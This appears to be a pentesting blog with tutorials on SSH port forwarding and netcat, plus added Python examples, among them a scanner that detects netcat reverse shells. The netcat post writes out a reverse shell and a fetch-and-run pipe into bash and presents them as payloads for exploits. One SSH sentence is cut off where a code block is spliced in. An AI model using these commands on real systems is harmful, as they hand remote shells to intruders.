All Posts:

2020
  April: Traverxec
  January: Openadmin

2019
  November: Networked, SSH Tunnel, Netcat, Haystack

SSH Tunnel

|| SSH Tunnel ||

A very popular service, used by almost all system administrators for remote administration because it provides a secure, encrypted connection. For a pentester it is more useful than it seems.

Quick basics: the default ssh port is 22; both Windows and Linux support ssh; ssh gives you a remote tty shell.

Login:
ssh user@168.192.1.100 (or user@hostname.com)
Login with ssh key:
ssh -i key user@hostname.com
Those are the very basics of ssh, but ssh has an important feature, tunneling or ssh port forwarding, which is useful in many situations and is what we will discuss here.

Local port forwarding:

Imagine you are on a remote server and find a service listening on localhost there that you might be able to exploit (a database server normally listens on localhost). How can you access it? You can connect to it through an ssh tunnel.
ssh -L 8080:localhost:8080 user@remotehost.net
-L stands for local, and this is called local port forwarding. The first 8080 is the port on your machine, the second 8080 is the port on the remote machine. Now, if you request localhost:8080 from your browser, that request is sent through the ssh tunnel to the remote host and you are connected to the remote service. So what this tunnel does is forward whatever you send to your localhost on to the remote machine's localhost (I hope this line makes sense!).

Now let's make it more complicated (not really, just joking!!): send a request to a server through a second machine, an ssh proxy, from your client. Your machine is the client, the second machine to which you are making the tunnel is the proxy, and the third machine is the server.
ssh -L 8000:server:80 user@proxy.net
Then open localhost:8000 in your browser and you will be connected to the server. The machine you tunnel through works as a proxy and sends requests to the server on your behalf, so if your IP is blocked but the ssh proxy machine can reach the server, you can use this. Note that this also works as a very basic VPN: it is fully encrypted and under your control. But it is not a fully functional VPN or proxy, because the IP and port of the socket are fixed; to overcome this limitation you can use dynamic tunneling.

Dynamic tunneling:

You can use your ssh server as a fully functional proxy through dynamic tunneling. It runs a SOCKS proxy, a proxy protocol, under the ssh tunnel.
ssh -D 8080 user@server.net
This simple command creates the proxy; configure your browser to send traffic through the proxy on port 8080, then all the traffic of your browser
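To make "a SOCKS proxy under the ssh tunnel" concrete: after `ssh -D 8080`, a browser configured for the proxy speaks SOCKS5 (RFC 1928) to 127.0.0.1:8080, and the ssh client opens the requested destination from the server's side. The following is an added example, not code from the original post; it builds and parses the two messages the client sends (the method greeting and the CONNECT request) so you can see exactly what crosses the local socket. It needs no network; the destinations are constructed sample values.

```python
import socket
import struct

SOCKS_VERSION = 0x05
CMD_CONNECT = 0x01
ATYP_IPV4, ATYP_DOMAIN, ATYP_IPV6 = 0x01, 0x03, 0x04
METHOD_NO_AUTH = 0x00  # the method ssh -D accepts: no SOCKS-level authentication


def build_greeting(methods=(METHOD_NO_AUTH,)) -> bytes:
    """First client message: VER | NMETHODS | METHODS (RFC 1928, section 3)."""
    return bytes([SOCKS_VERSION, len(methods), *methods])


def build_connect(host: str, port: int) -> bytes:
    """CONNECT request: VER | CMD | RSV | ATYP | DST.ADDR | DST.PORT.

    A literal IP is sent packed; anything else goes as a domain name (ATYP 3),
    so the proxy end resolves it, not the browser."""
    if not 0 <= port <= 65535:
        raise ValueError("port out of range")
    try:
        dst = bytes([ATYP_IPV4]) + socket.inet_pton(socket.AF_INET, host)
    except OSError:
        try:
            dst = bytes([ATYP_IPV6]) + socket.inet_pton(socket.AF_INET6, host)
        except OSError:
            name = host.encode("idna")
            if not name or len(name) > 255:
                raise ValueError("domain name must be 1..255 bytes")
            dst = bytes([ATYP_DOMAIN, len(name)]) + name
    return bytes([SOCKS_VERSION, CMD_CONNECT, 0x00]) + dst + struct.pack("!H", port)


def parse_connect(data: bytes) -> dict:
    """Decode a CONNECT request exactly; raise ValueError on anything malformed."""
    if len(data) < 8 or data[0] != SOCKS_VERSION:
        raise ValueError("not a SOCKS5 request")
    cmd, atyp, pos = data[1], data[3], 4
    if cmd != CMD_CONNECT:
        raise ValueError(f"unsupported command {cmd}")
    if atyp == ATYP_IPV4:
        host, pos = socket.inet_ntop(socket.AF_INET, data[pos:pos + 4]), pos + 4
    elif atyp == ATYP_IPV6:
        host, pos = socket.inet_ntop(socket.AF_INET6, data[pos:pos + 16]), pos + 16
    elif atyp == ATYP_DOMAIN:
        n = data[pos]
        host, pos = data[pos + 1:pos + 1 + n].decode("idna"), pos + 1 + n
    else:
        raise ValueError(f"unknown address type {atyp}")
    if len(data) != pos + 2:
        raise ValueError("truncated or trailing bytes in request")
    (port,) = struct.unpack("!H", data[pos:pos + 2])
    return {"host": host, "port": port, "atyp": atyp}


if __name__ == "__main__":
    print(build_greeting().hex())
    req = build_connect("example.com", 443)   # constructed destination
    print(req.hex(), parse_connect(req))
```

The proxy's answers (method selection, reply with bound address) are left out; the point is what leaves the browser. Because a hostname travels as ATYP 3, the name is resolved by the ssh client on the server side, but only if the browser is told to send names rather than resolving them itself (Firefox calls the option "Proxy DNS when using SOCKS v5"); otherwise DNS queries still leak out locally even though the TCP traffic goes through the tunnel.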

Remote port forwarding:

Another type of port forwarding is remote port forwarding, useful when a service is behind NAT and you want to expose it to the public.
ssh -R 4000:localhost:5000 user@server.net
It forwards every request that reaches port 4000 on server.net to port 5000 on your machine. When your machine is behind a NAT, someone can send a request to server:4000 and it will be forwarded to your machine.

Quick commands:
ssh -L 8000:localhost:9000 user@hostname.net
ssh -L localhost:8000:localhost:9000 user@hostname.net
(same as the first one, but in the first case anyone on your network can use this tunnel, while in the second case only you can connect)
ssh -D 9001 user@hostname.net
ssh -R 4000:localhost:5000 user@server.net
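What the ssh client actually does for `-L [bind_address:]port:host:hostport` is small: parse the spec, bind a listener, and copy bytes between each accepted client and the destination (the encrypted hop is what ssh adds on top). The added example below is not the post's code; it reproduces that core in plain Python so the two "quick command" forms can be compared directly. One caveat worth knowing: when no bind_address is given, ssh binds according to the GatewayPorts option, whose default is no, so a plain `-L 8000:...` listener is loopback-only; exposing it to other hosts takes an explicit `*:` or `0.0.0.0:` bind address (or GatewayPorts yes, which for `-R` must be set in the server's sshd). The parser below follows that rule. The "remote" service is a constructed in-process echo server standing in for whatever sits behind the hop; bracketed IPv6 specs are left out to keep the example short.

```python
import socket
import threading
from dataclasses import dataclass


@dataclass
class ForwardSpec:
    bind_address: str  # address the local listener binds to
    port: int          # local listening port
    host: str          # destination, reached from the far end of the hop
    hostport: int


def parse_forward_spec(spec: str, gateway_ports: bool = False) -> ForwardSpec:
    """Parse '[bind_address:]port:host:hostport' the way ssh -L/-R reads it:
    no bind_address -> follow GatewayPorts (loopback when 'no', the default);
    'localhost' -> loopback; '*' or empty -> all interfaces."""
    parts = spec.split(":")
    if len(parts) == 3:
        bind = "0.0.0.0" if gateway_ports else "127.0.0.1"
        port, host, hostport = parts
    elif len(parts) == 4:
        bind, port, host, hostport = parts
        if bind in ("", "*"):
            bind = "0.0.0.0"
        elif bind == "localhost":
            bind = "127.0.0.1"
    else:
        raise ValueError(f"bad forward spec: {spec!r}")
    return ForwardSpec(bind, int(port), host, int(hostport))


def _pump(src: socket.socket, dst: socket.socket) -> None:
    """Copy src -> dst until EOF, then half-close dst so the peer sees EOF."""
    try:
        while chunk := src.recv(65536):
            dst.sendall(chunk)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def _relay(a: socket.socket, b: socket.socket) -> None:
    """Run both directions; close both ends once each side has finished."""
    threads = [threading.Thread(target=_pump, args=p, daemon=True) for p in ((a, b), (b, a))]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    a.close()
    b.close()


def serve_forward(spec: ForwardSpec) -> socket.socket:
    """Listen on spec.bind_address:spec.port and relay each client to
    spec.host:spec.hostport. Returns the listener so the caller can read the
    bound port (when spec.port is 0) and close it to stop accepting."""
    listener = socket.socket()
    listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    listener.bind((spec.bind_address, spec.port))
    listener.listen(5)

    def accept_loop() -> None:
        while True:
            try:
                client, _ = listener.accept()
            except OSError:
                return  # listener closed by the caller
            try:
                target = socket.create_connection((spec.host, spec.hostport), timeout=5)
            except OSError:
                client.close()  # destination unreachable: drop the client, as ssh does
                continue
            target.settimeout(None)
            threading.Thread(target=_relay, args=(client, target), daemon=True).start()

    threading.Thread(target=accept_loop, daemon=True).start()
    return listener


def start_echo_server() -> int:
    """Constructed stand-in for the service on the far side of the hop."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)

    def loop() -> None:
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:
                return
            threading.Thread(target=_pump, args=(conn, conn), daemon=True).start()

    threading.Thread(target=loop, daemon=True).start()
    return srv.getsockname()[1]


def demo_round_trip(payload: bytes = b"GET / HTTP/1.0\r\n\r\n") -> bytes:
    """client -> forwarder -> echo server, all on loopback; returns the reply."""
    echo_port = start_echo_server()
    spec = parse_forward_spec(f"0:127.0.0.1:{echo_port}")  # like -L 0:127.0.0.1:PORT
    listener = serve_forward(spec)
    local_port = listener.getsockname()[1]
    with socket.create_connection(("127.0.0.1", local_port), timeout=5) as c:
        c.sendall(payload)
        c.shutdown(socket.SHUT_WR)
        reply = b"".join(iter(lambda: c.recv(4096), b""))
    listener.close()
    return reply


if __name__ == "__main__":
    print(parse_forward_spec("8000:localhost:9000"))
    print(parse_forward_spec("localhost:8000:localhost:9000"))
    print(demo_round_trip())
```

Run it and the two quick-command forms parse to the same ForwardSpec, which is why the GatewayPorts setting, not the spelling of the spec, decides who can reach a `-L` listener.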
Hope you enjoyed; Happy Hacking.

Netcat

|| NetCat: The Swiss Army Knife ||

Netcat is a super useful tool for a pentester. It gives you the ability to use raw sockets. Ncat is a similar tool that can also be used on Windows; both are nearly the same in functionality. Here I will discuss the most common uses of netcat. It can be used for port scanning, banner grabbing and chatting, but most commonly it is used for getting a reverse shell and for file transfer.

To set up a netcat listener on your Linux system, type this command in your terminal:
nc -nvlp 1337
n for no DNS lookup, v for verbose output, l for listen and p for port. To connect to a port:
nc -n 127.0.0.1 1337
Now, if you want to transfer a file through netcat:
nc -nvlp 1337 < shell.sh
Just redirect your file into the netcat listener, and when a client connects it will send the file automatically. This is super handy when you are testing a system where neither curl nor wget is installed. To receive the file, just connect to the netcat listener; but once connected it prints the content of the file to stdout (your terminal window), which is not very useful. Here you can do two things. One is to redirect it to a file:
nc -n 127.0.0.1 1337 > shell.sh
This way the output is saved into a file. The other thing you can do, if that file is a shell script you want to run, is execute it directly by piping it to bash or whatever shell you have:
nc -n 127.0.0.1 1337 | bash
This executes the script. The last example is used when you want to enumerate the target system: just get the enumeration script and run it with bash.

Another important use is the netcat reverse shell. On your target system you can get a reverse shell with netcat. Set up a listener on your local machine:
nc -nvlp 1337
Then connect to it from target system:
nc -e bash 127.0.0.1 1337
Once executed, you will get a bash shell from the target system. You can send this command as a payload through a file, through a vulnerable URL or by any other exploit. To find out whether a port is open on your target system, just try to connect to that port with netcat; you will get a response back if it is open. This is handy for quick banner grabbing and for confirming whether a port is open.
nc 127.0.0.1 443
It tests whether HTTPS is open or closed on your localhost. Netcat has a lot more capabilities, and you can read about them in its man page or with the nc -h command.
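The `nc -lvnp 1337 < file` / `nc host 1337 > file` pair moves raw bytes and nothing else: the receiver cannot tell a complete file from a stream that was cut off, and `| bash` will run whatever arrived. The added example below is not the post's code; it reproduces the sender and receiver in Python and adds the check a practitioner wants before using a file fetched this way: the sender announces the length and SHA-256 on a header line, and the receiver refuses anything that does not match. The script content is a constructed sample, everything runs on loopback, and `truncate_to` is an assumption of this example used to simulate a connection that drops mid-transfer.

```python
import hashlib
import os
import socket
import tempfile
import threading
from typing import Optional

# Constructed sample payload standing in for an enumeration script.
SAMPLE_SCRIPT = b"#!/bin/sh\n# constructed sample enumeration script\nid\nuname -a\n"


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def serve_file_once(data: bytes, truncate_to: Optional[int] = None) -> int:
    """Like 'nc -lvnp PORT < file', plus one header line '<length> <sha256>\\n'
    before the bytes so the receiver can check what arrived. truncate_to (an
    assumption of this example) sends only a prefix of the data while the header
    still advertises the whole file. Returns the loopback port bound."""
    listener = socket.socket()
    listener.bind(("127.0.0.1", 0))
    listener.listen(1)
    body = data if truncate_to is None else data[:truncate_to]

    def handle() -> None:
        conn, _ = listener.accept()
        with conn:
            conn.sendall(f"{len(data)} {sha256_hex(data)}\n".encode("ascii"))
            conn.sendall(body)
        listener.close()

    threading.Thread(target=handle, daemon=True).start()
    return listener.getsockname()[1]


def fetch_file(host: str, port: int, timeout: float = 5.0) -> bytes:
    """Like 'nc host PORT > file', but raise ValueError instead of keeping a
    stream whose length or SHA-256 disagrees with the header."""
    with socket.create_connection((host, port), timeout=timeout) as c:
        buf = b""
        while b"\n" not in buf:
            chunk = c.recv(4096)
            if not chunk:
                raise ValueError("connection closed before header arrived")
            buf += chunk
        header, _, body = buf.partition(b"\n")
        length_s, _, digest = header.decode("ascii").partition(" ")
        length = int(length_s)
        while len(body) < length:
            chunk = c.recv(65536)
            if not chunk:
                break  # peer closed early
            body += chunk
    if len(body) != length:
        raise ValueError(f"truncated: got {len(body)} of {length} bytes")
    if sha256_hex(body) != digest:
        raise ValueError("SHA-256 mismatch: refusing to keep the file")
    return body


def demo_transfer(data: bytes = SAMPLE_SCRIPT) -> str:
    """Serve data on loopback, fetch it, write it to a temp file and return the
    SHA-256 of what landed on disk (equal to the sender's digest on success)."""
    port = serve_file_once(data)
    received = fetch_file("127.0.0.1", port)
    with tempfile.TemporaryDirectory() as d:
        path = os.path.join(d, "shell.sh")
        with open(path, "wb") as f:
            f.write(received)
        with open(path, "rb") as f:
            return sha256_hex(f.read())


if __name__ == "__main__":
    print("received OK:", demo_transfer())
    port = serve_file_once(SAMPLE_SCRIPT, truncate_to=10)
    try:
        fetch_file("127.0.0.1", port)
    except ValueError as err:
        print("rejected:", err)
```

With plain netcat you get the same protection by comparing `sha256sum` output on both ends before piping anything to a shell; the point of the example is that the bare transfer gives you no signal at all when the stream stops short.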

Quick Commands:

Set listener:
nc -lvnp 1337
Connect to a socket:
nc 127.0.0.1 1337
Send a file:
nc -lvnp 1337 < file.txt
Get a file:
nc 127.0.0.1 1337 > file.txt
Execute a shell script:
nc 127.0.0.1 1337 | bash
Reverse shell:
nc -e bash 127.0.0.1 1337
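Because `nc -e bash` hands a shell to whoever is on the other end, it is one of the first things defenders look for in process telemetry. The added example below is not the post's code; it is a small scanner over constructed lines in `ps -eo pid,ppid,user,args` layout that flags netcat-family binaries started with an exec flag, flags the `nc ... | bash` form from the file-transfer section when it runs through a shell's `-c`, and reports plain listeners at informational level. Two facts it relies on: `-e` exists in nc.traditional and ncat (ncat also spells it `--exec`, and `-c`/`--sh-exec` runs a shell command), while the OpenBSD netcat that many Linux distributions ship as `nc` has no `-e` and uses `-c` for TLS, which is why `-c` is reported at lower severity. The rule names, PIDs, users and the 10.0.0.5 address are all constructed.

```python
import os
import re
import shlex
from dataclasses import dataclass
from typing import List, Optional

# Netcat family. Only nc.traditional and ncat implement -e; OpenBSD nc does not.
NETCAT_BINARIES = {"nc", "ncat", "netcat", "nc.traditional", "nc.openbsd"}
SHELLS = {"sh", "bash", "dash", "zsh", "ash"}
# 'nc ... | bash' run through a shell's -c (the post's "execute a shell script" form).
PIPE_TO_SHELL = re.compile(r"\b(?:nc|ncat|netcat)\b[^|;&]*\|\s*(?:/bin/)?(?:ba|da|z)?sh\b")

# Constructed sample in 'ps -eo pid,ppid,user,args' layout; no real hosts or users.
SAMPLE_PS = """\
  PID  PPID USER     ARGS
    1     0 root     /sbin/init
  812     1 www-data /usr/sbin/apache2 -k start
 2311   812 www-data nc -e bash 10.0.0.5 1337
 2320  2311 www-data bash
 2402     1 alice    nc -lvnp 1337
 2510   812 www-data sh -c "nc 10.0.0.5 1337 | bash"
 2611     1 bob      ncat --ssl example.org 443
 2700     1 bob      /bin/nc.traditional -nv 10.0.0.5 80
"""


@dataclass
class Finding:
    pid: int
    user: str
    rule: str
    severity: str
    args: str


def _short_flags(argv: List[str]) -> str:
    """Letters of clustered short options (-nvlp -> 'nvlp'); long options skipped."""
    return "".join(t[1:] for t in argv[1:] if t.startswith("-") and not t.startswith("--"))


def _exec_severity(argv: List[str]) -> Optional[str]:
    """-e/--exec/--sh-exec hand a program to the peer -> high.
    -c is --sh-exec in nc.traditional/ncat but TLS in OpenBSD nc -> medium."""
    longs = [t.split("=")[0] for t in argv[1:] if t.startswith("--")]
    flags = _short_flags(argv)
    if "e" in flags or "--exec" in longs or "--sh-exec" in longs:
        return "high"
    if "c" in flags:
        return "medium"
    return None


def scan_process_line(line: str) -> Optional[Finding]:
    """Parse one 'PID PPID USER ARGS' line; return a Finding or None."""
    parts = line.split(None, 3)
    if len(parts) < 4 or not parts[0].isdigit():
        return None  # header or malformed line
    pid, user, args = int(parts[0]), parts[2], parts[3]
    try:
        argv = shlex.split(args)
    except ValueError:
        argv = args.split()  # unbalanced quotes: fall back to a plain split
    if not argv:
        return None
    exe = os.path.basename(argv[0])
    if exe in NETCAT_BINARIES:
        sev = _exec_severity(argv)
        if sev:
            return Finding(pid, user, "netcat-exec-flag", sev, args)
        if "l" in _short_flags(argv):
            return Finding(pid, user, "netcat-listener", "info", args)
    if exe in SHELLS and "-c" in argv:
        i = argv.index("-c")
        if i + 1 < len(argv) and PIPE_TO_SHELL.search(argv[i + 1]):
            return Finding(pid, user, "netcat-piped-to-shell", "high", args)
    return None


def scan_process_table(text: str) -> List[Finding]:
    return [f for f in map(scan_process_line, text.splitlines()) if f]


if __name__ == "__main__":
    for f in scan_process_table(SAMPLE_PS):
        print(f"[{f.severity}] pid={f.pid} user={f.user} {f.rule}: {f.args}")
```

On the sample table the scanner raises the web server's child running `nc -e bash` and the `sh -c "nc ... | bash"` line as high, notes alice's listener as informational, and stays quiet on the `ncat --ssl` client and the plain `nc -nv` connect, which is the balance you want: command-line flags alone are a weak signal, and a listener or a connect is ordinary administration, but a netcat with an exec flag under a service account is worth a look every time.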
Hope you enjoyed; Happy Hacking.